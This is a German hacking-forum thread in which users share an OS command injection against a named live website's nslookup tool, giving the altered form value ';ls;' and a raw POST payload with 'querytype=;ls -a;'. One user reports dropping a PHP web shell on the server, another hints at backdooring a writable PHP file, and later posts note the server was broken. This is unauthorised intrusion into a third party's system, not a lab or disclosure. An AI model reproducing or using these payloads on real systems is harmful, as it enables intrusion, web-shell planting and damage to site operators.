Jump to content

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Sign In 

Create Account

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Photo

[OSCI]networking.ringofsaturn.com

- - - - -
Started by Zero-X ,
webhacking osci

  • Please log in to reply
8 replies to this topic

#1
Zero-X
Posted 31 March 2018 - 10:40 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 posts
  • 45 Bedankt
  • Android
  • Windows, Linux

URL:

https://networking.ringofsaturn.com/Tools/nslookup.php

Bei "Hostname" geben wir einen beliebigen Domainnamen ein.

"Query Type" ändern wir mit der Funktion "Element untersuchen" im Firefox folgendermaßen um:

<option value=";ls;">;ls;</option>

Dann klicken wir auf "Submit".

 

ds8txjdypk9rj5vy8.png


  • Ch!ller, CyberFlash and SecurityFlaw like this

#2
ProHex
Posted 03 April 2018 - 12:18 Uhr

ProHex

    Hacker

  • Moderator
    • Likes
    212
  • 219 posts
  • 185 Bedankt

Nice gefunden. 

 

FreeBSD tethys.ringofsaturn.com 11.1-STABLE FreeBSD 11.1-STABLE #12 r331093: Sun Mar 18 13:32:07 CDT 2018 root@tethys.ringofsaturn.com:/usr/obj/usr/src/sys/GENERIC amd64

 
 

<option value=";ls;">;ls;</option>

 

Den Value ändern versteh ich noch. Aber warum was zwischen dem <option> tag steht?

 

 

 

#3
Zero-X
Posted 03 April 2018 - 20:00 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 posts
  • 45 Bedankt
  • Android
  • Windows, Linux
Normal reicht es, den Parameter bei Value zu ändern. Das beim Option-Tag habe ich nur wegen der besseren Übersicht gemacht :)

#4
SecurityFlaw
Posted 03 April 2018 - 20:33 Uhr

SecurityFlaw

    ██████████

  • Members
  • PipPipPipPipPipPipPipPipPip
    • Likes
    212
  • 256 posts
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

So gehts doch auch:

78r9Hf0.png

https://networking.ringofsaturn.com/Tools/nslookup.php | POST: domain=127.0.0.1&server=tethys.ringofsaturn.com&querytype=;ls -a;

EDIT: "ls -all" zeigt mehr an ;)


Edited by SecurityFlaw, 03 April 2018 - 20:37 Uhr.

  • PaulaAbdul and Zero-X like this

#5
sub0
Posted 14 April 2018 - 20:38 Uhr

sub0

    Script Kiddie

  • Premium Member
    • Likes
    32
  • 39 posts
  • 14 Bedankt
  • Android
  • Windows, Linux

Hab mich durchgekämpft und 'ne php Shell gedroppt. Na, fällt euch was auf? :831:

h4nya5Y.png


  • SecurityFlaw and 3eyes like this

/dev/zero - PN für XMPP

#6
pi^2
Posted 21 April 2018 - 01:22 Uhr

pi^2

    Hacker

  • Premium Member
    • Likes
    273
  • 181 posts
  • 46 Bedankt

hat wohl jemand was kaputt gemacht ...

 

weniger deface, mehr wissensmenge sammeln, "durchkämpfen" ist bei ner OSCI wohl nicht so schwer, soweit ich weiß: ../links.php owner: www => hätte man hier nurn snippet adden müssen.


  • Zero-X likes this

#7
sub0
Posted 21 April 2018 - 16:33 Uhr

sub0

    Script Kiddie

  • Premium Member
    • Likes
    32
  • 39 posts
  • 14 Bedankt
  • Android
  • Windows, Linux

Ich, zu meiner Person: habe weder irgendein defacement, noch irgendwas kaputt gemacht.

 

Aber danke für deinen Ratschlag mehr Wissen zu sammeln.


/dev/zero - PN für XMPP

#8
SecurityFlaw
Posted 22 April 2018 - 13:03 Uhr

SecurityFlaw

    ██████████

  • Members
  • PipPipPipPipPipPipPipPipPip
    • Likes
    212
  • 256 posts
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

Passiert leider häufig, das veröffentlichte Sicherheitslücken zum Verlust des Servers führen.

Musste wohl wieder jemand kaputtspielen was?


  • Zero-X likes this

#9
Zero-X
Posted 22 April 2018 - 22:00 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 posts
  • 45 Bedankt
  • Android
  • Windows, Linux
Wenn man eine Sicherheitslücke auf einer Seite public macht, muss man damit rechnen das Unsinn damit gemacht wird. Ich finde so etwas unfair den Leuten gegenüber die  anhand der Lücke noch etwas lernen wollen.
  • SecurityFlaw likes this
Back to  Classic Hacking

  Topic Forum Started By Stats Last Post Info

user(s) are reading this topic

members, guests, anonymous users


This topic has been visited by 60 user(s)


    1x1, 3eyes, B1nary, bebekid32, Bloodman, blue_eyed_devil, caballo, Ch!ller, cubik, Cyber Tjak, CyberFlash, desmond, docsnider, Dr. Spic, fl4shx, Framerater, Franziskaner, Freshness28, FrogPussyGreen, Gatsby13, Giganet, gtawelt, hacked, hanshenkelman, hlaus777, jmPesp, kiwitone, Klaus, leonalexkraus, lNobodyl, marcf2009, mettbrot, Mini Rick, Mofug, Mr_NiceGuy, nibble nibble, o0o, Osed28, p.samson, PadX18, PaulaAbdul, pepeSito, peppi200, phreshmail, pi^2, ProHex, Psykoon303, pwcca, R3s1stanc3, s3ff, SecurityFlaw, SerimArda, sub0, sup3ria, Terrafaux, VerZus, vitovice, z91, Zero-X, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking